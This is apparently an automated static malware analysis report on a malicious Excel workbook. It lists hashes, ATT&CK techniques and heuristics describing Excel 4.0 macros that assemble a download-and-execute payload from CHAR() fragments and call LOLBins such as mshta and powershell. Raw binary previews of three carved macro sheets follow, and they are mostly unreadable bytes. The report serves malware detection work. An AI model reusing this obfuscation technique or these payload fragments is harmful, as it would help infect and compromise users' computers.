Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0ad1bdd1ad3522d1…

MALICIOUS

Office (OOXML)

142.9 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 170cc55be95e5adb455f26f465bf4bda SHA-1: 6753c82e96694a4547f5a19afaa455101eba9160 SHA-256: 0ad1bdd1ad3522d1c9c03b29d8f15c2b8cc197738583d8e70dad89106b664a7c
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel document containing Excel 4.0 macros, which are known to be used for malicious purposes. The heuristic 'XLM payload reassembled from CHAR() split formulas' indicates that the macros are likely constructing and executing a payload, potentially downloading it from the observed URL fragment. The specific payload and its ultimate destination are not fully discernible from the provided evidence.

Heuristics 2

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin 6043 bytes
SHA-256: 1c80844a1920f15fc9974fa2495b7e86a9708e3f6d19e737ae52d69cb9a1c2b3
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �      �       F   �  %      ��                  & �  �             @   d           � $                                    �  �  %      ��    & �  �     ,     �  <     8   �         < 9   9   �         < :   B   �         < C   �?  �         �  �  %      ��    &           ,        :   C     <           %      ��    &           ,        :   C     <           %      ��    &           ,        :   C     :         <         =         >         ?             @             B           %      ��    &           ,        :   C     :             <         =             >         ?             @             B       %      ��    &           ,        :   C     :         <         =         >         ?             @             B       %      ��    &           ,        :   C     :         <         =             >         ?       	     @         A         B         C       %      ��    &           ,        :   C     :         <         =       
     >         ?             @         A         B         C       %      ��    &           ,        :   F     :             <         =         >         ?         @         A         B         C         D         E         F       %      ��    &   !       ,        :   F     :       
     <         =         >         ?             A         B         C         D         E         F       %      ��    &   "       ,        :   F     :             <         =         >         ?         @         A         B         C         D         E         F       %      ��    &   #       ,        :   F     :             <         =         >             ?             @         A         B             C         D         E         F       %      ��    &   $       ,        :   F     :             =         >         ?         @         A         B             C         D         E         F       %      ��    &   %       ,        :   F     :             =         >         ?         @         A         B         C         D         E         F       %      ��    &   &       ,        :   F     :         =             >             ?         @         A         B         C         D         E         F       %      ��    &   '       ,        :   F     >         ?         @         A         B         C         D         E         F       %      ��    &   (       ,        :   F     =       
     A        FB           L   .      L d e c v s b g v r s x L x r g x g    B s       C         D         E         F       %      ��    &   )       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   *       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   +       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   ,       ,        :   F     =             A         B         C         D         E         F       %      ��    &   -       ,        :   F     A         B         C         D         E         F       %      ��    &   .       ,        :   F     A         B         C         D         E         F       %      ��    &   /       ,        :   F     A         B         C         D         E         F       %      ��    &   0       ,        5   F     A         B         C         D         E         F       %      ��    &   1       ,        5   F     5         A         B         C         D         E         F       %      ��    &   2       ,        5   F     A         B         C         D         E         F       %      ��    &   3       ,        5   F     A         B         C         D         E         F       %      ��    &   4       ,        5   F     A         B         C         D         E         F       %      ��    &   5       ,        5   F     A         B         C         D         E         F       %      ��    &   6       ,        5   F     A         B         C         D         E         F       %      ��    &   7       ,        5   F     B       %      ��    &   8     
... (truncated)
xlm_sheet_01.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin 1210 bytes
SHA-256: 712bbc69f3cc36ab0573bb499af1321191d69be6b1945faa70f3280f2fbe536a
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �          &   4   �  %      ��                  & �  �             @   d           � $                                    �  �  %      ��    & �  �     ,     �  < /   /   �         < 0   4   �         �  �  %      ��    &           ,        &   2     &       %      ��    &   	       ,        &   2     &         2       %      ��    &   
       ,        &   2     2       %      ��    &           ,        &   2     2       %      ��    &           ,        &   2     2       %      ��    &   
       ,        &   2     /         2       %      ��    &           ,        &   2     /         0       %      ��    &           ,        &   2     /         0         2       %      ��    &           ,        0   3     0       %      ��    &           ,        0   3     0       %      ��    &           ,        0   3   
 0              B 6     %      ��    &           ,        0   3     0         1         3       %      ��    &           ,        0   3     0         1         3       �  � B                                                                  �  P�� 0ffffff�?ffffff�?      �?      �?333333�?333333�?�    �������������������������  %      ��                  & �
xlm_sheet_02.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin 5857 bytes
SHA-256: 844680dcf102a752409c1b1819387a69922fbae9663ed6c3c7621f5e84502402
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �      ,   4   :   �  %      ��                  & �  �             @   d           � $                                    �  �  %      ��    & �  �     ,     �  < 3   3   m         < 4   :   �         �  �  %      ��    &           ,        4   7   
%7                 D o c 2    B  �    %      ��    &   
       ,        4   7   
87          %      D o c 3    B  �   D o c 4    B  �     %      ��    &           ,        4   7    � 4       $  �    �������TA   ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�     U Z      2� Z      ?� Z      ?� :  	   2�B `�      � 7       $  �    ��;�u')LAc  ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�  Z  &   =�Z      B� Z      2� Z  *   =� Z  	   2� Z  (   =� Z  )   =� Z  (   =� Z  
   2� Z  (   =� Z  )   =� Z  (   =� Z      2� Z  (   =� Z  ,   =� Z  )   =� Z  (   =�    h t t p s : / /  Z      2� Z  (   =� Z  )   =� Z  (   =� Z      <� Z  (   =� Z  ,   =� Z  ,   =� Z  +   =� :  	   0�B `�       � A ��A/      %      ��    &           ,        4   :     4       %      ��    &           ,        4   :   
)4              Z  #   B�:      2�B `�    
 7              :      0�A5     %      ��    &           ,        4   :   
C4          0   Z      @�Z      @� Z      @�    B  :      2�B `�     � :       $  �    �������TA   ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�  Z      2�Z      :� Z  #   :� Z  $   :� Z  %   :� Z  !   :� Z  "   :� Z  !   :� Z      <� Z      :� :  
   0�B `�     %      ��    &           ,        4   :   
)4              Z  (   B�:      2�B `�     � :       $  �    �������TA   ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9H
... (truncated)